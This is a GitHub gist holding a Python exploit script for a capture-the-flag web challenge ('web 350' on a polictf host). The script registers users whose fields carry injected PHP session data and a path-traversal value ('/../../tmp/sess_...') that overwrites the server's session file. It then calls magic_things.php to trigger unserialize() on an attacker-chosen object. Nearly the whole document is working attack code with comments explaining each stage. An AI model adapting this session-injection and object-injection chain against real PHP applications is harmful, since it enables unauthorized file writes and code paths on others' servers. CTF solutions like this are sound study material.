Skip to content

Instantly share code, notes, and snippets.

@cebrusfs
Last active May 10, 2017 08:12
Show Gist options
  • Save cebrusfs/582492a4036dc41b2a76 to your computer and use it in GitHub Desktop.
Save cebrusfs/582492a4036dc41b2a76 to your computer and use it in GitHub Desktop.
web 350
import requests
import random
import string
URL = 'http://magic.polictf.it/'
name = ''.join(random.sample(string.ascii_letters, 10))
sessid = 'trbfs2mbi41lmeg32439vu1gb4'
'''
# 1. binding the user and session which make isLogged() checking in 'magic_things.php' passed.
# It does not needed.
# Because even if isLogined() check fail,
# it will still execute the rest of code which is include 'unserialize()'.
r = requests.post(
URL + 'index.php',
params = {'page': 'register'},
data = {
'name': name,
'surname': name,
'username': name,
'password': name,
'register': 'send'
}
)
print 'register', 'ok, now u can log in' in r.text
r = requests.post(
URL + 'index.php',
data = {
'username': name,
'password': name,
'login': 'login'
},
cookies = {
'PHPSESSID': sessid
}
)
print 'login', 'magic_things.php' in r.text
print r.text
print 'stage1 done'
raw_input()
'''
# 2. register a new user and let it login, and it will active and overwrite the log (our session file)
# (in active, fopen is "w+")
name2 = name + '_write'
r = requests.post(
URL + 'index.php',
data = {
# inject session content
# `s:0:""` is for fixing the user field
# and inject { user: name, userObject: serialize(new Magic) }
'name': 's:0:"";user|s:%d:"%s";userObject|s:16:"O:5:"Magic":0:{}";' % (len(name), name),
'surname': '/../../tmp/sess_' + sessid,
'username': name2,
'password': name2,
'register': 'send'
}
)
print 'register', 'ok, now u can log in' in r.text
# login and write session !!!!!!
r = requests.post(
URL + 'index.php',
data = {
'username': name2,
'password': name2,
'login': 'login'
}
)
print 'login', 'magic_things.php' in r.text
print 'stage2 done'
# 3. triger unserialize
r = requests.get(
URL + 'magic_things.php',
params = {'logout': 'true'},
cookies = {
'PHPSESSID': sessid
},
# because isLogined() check fail will redirect
# but it will still execute unserialize and output result
# we need that result
allow_redirects=False
)
print r.text
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment